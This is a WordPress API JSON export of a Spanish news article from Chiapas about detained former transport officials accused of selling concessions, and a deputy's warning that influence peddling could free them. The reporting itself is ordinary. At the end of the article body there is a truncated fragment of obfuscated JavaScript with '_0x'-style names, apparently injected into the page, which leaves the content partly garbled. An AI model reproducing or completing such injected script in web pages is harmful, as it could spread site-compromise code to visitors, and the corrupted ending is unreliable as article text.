{"id":25975,"date":"2026-01-05T01:48:05","date_gmt":"2026-01-05T01:48:05","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25975"},"modified":"2026-01-05T01:48:06","modified_gmt":"2026-01-05T01:48:06","slug":"funcionarios-detenidos-por-venta-de-plazas-y-concesiones-no-deben-ser-liberados","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25975","title":{"rendered":"Funcionarios detenidos por venta de plazas y concesiones no deben ser liberados"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000528338-1024x768.jpg\" alt=\"\" class=\"wp-image-25976\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000528338-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000528338-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000528338-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000528338-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2026\/01\/1000528338.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>4 de enero del 2026. Tras las detenciones de funcionarios de la pasada administraci\u00f3n de la Secretar\u00eda de Movilidad y Transporte del Estado de Chiapas, el diputado Rub\u00e9n Zuarth Esquinca, presidente de la Comisi\u00f3n de Movilidad y Transporte del Congreso local, alert\u00f3 sobre los se\u00f1alamientos de un presunto tr\u00e1fico de influencias que podr\u00eda llevar a la liberaci\u00f3n de los implicados.<\/p>\n\n\n\n<p>En entrevista, Zuarth Esquinca calific\u00f3 la corrupci\u00f3n en el transporte como \u201cuno de los grandes flagelos\u201d que afectan no solo este sector, sino tambi\u00e9n otras \u00e1reas como la educaci\u00f3n, donde se registran casos similares de venta ilegal de plazas magisteriales.<\/p>\n\n\n\n<p>El legislador detall\u00f3 que su comisi\u00f3n ha recibido numerosas quejas de personas que fueron enga\u00f1adas por funcionarios o intermediarios durante el sexenio anterior.<\/p>\n\n\n\n<p>\u201cAqu\u00ed llega gente que fue defraudada, lastimada, que tuvo que vender, empe\u00f1ar o deshacerse de sus ahorros con la idea de que obtendr\u00edan una concesi\u00f3n de transporte que nunca lleg\u00f3\u201d, afirm\u00f3.<\/p>\n\n\n\n<p>Zuarth se\u00f1al\u00f3 que los casos est\u00e1n documentados y que algunos de los implicados \u2014entre los que se menciona a exfuncionarios de la Secretar\u00eda de Movilidad e incluso ligados un expresidente municipal\u2014 ya fueron detenidos y est\u00e1n siendo procesados.<\/p>\n\n\n\n<p>Sin embargo, expres\u00f3 preocupaci\u00f3n por las influencias que podr\u00edan evitar que se aplique la justicia.<\/p>\n\n\n\n<p>\u201cExisten se\u00f1alamientos de que podr\u00edan ser liberados por un presunto tr\u00e1fico de influencias\u201d, reconoci\u00f3 el diputado.<\/p>\n\n\n\n<p>Ante esto, hizo un llamado a las v\u00edctimas a presentar denuncias formales: \u201cSi hay m\u00e1s gente que fue timada o enga\u00f1ada, que vayan a denunciar. Es el camino para evitar que se repitan estas situaciones\u201d.<\/p>\n\n\n\n<p>Finalmente, el diputado subray\u00f3 la importancia del transporte como eje del desarrollo estatal.<\/p>\n\n\n\n<p>\u201cHay que ver el transporte como la esfera de movilidad m\u00e1s importante, que genera econom\u00eda y progreso. Desde nuestro campo de acci\u00f3n, trabajaremos para ordenarlo y hacerlo m\u00e1s eficiente para la ciudadan\u00eda\u201d.<br>000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 4 de enero del 2026. Tras las detenciones de funcionarios de la pasada administraci\u00f3n de la Secretar\u00eda de Movilidad y Transporte del Estado de Chiapas, el diputado Rub\u00e9n Zuarth Esquinca, presidente de la Comisi\u00f3n de Movilidad y Transporte del Congreso local, alert\u00f3 sobre los se\u00f1alamientos de un presunto tr\u00e1fico de influencias que podr\u00eda &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25976,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25975","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25975","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25975"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25975\/revisions"}],"predecessor-version":[{"id":25977,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25975\/revisions\/25977"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25976"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25975"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25975"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25975"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}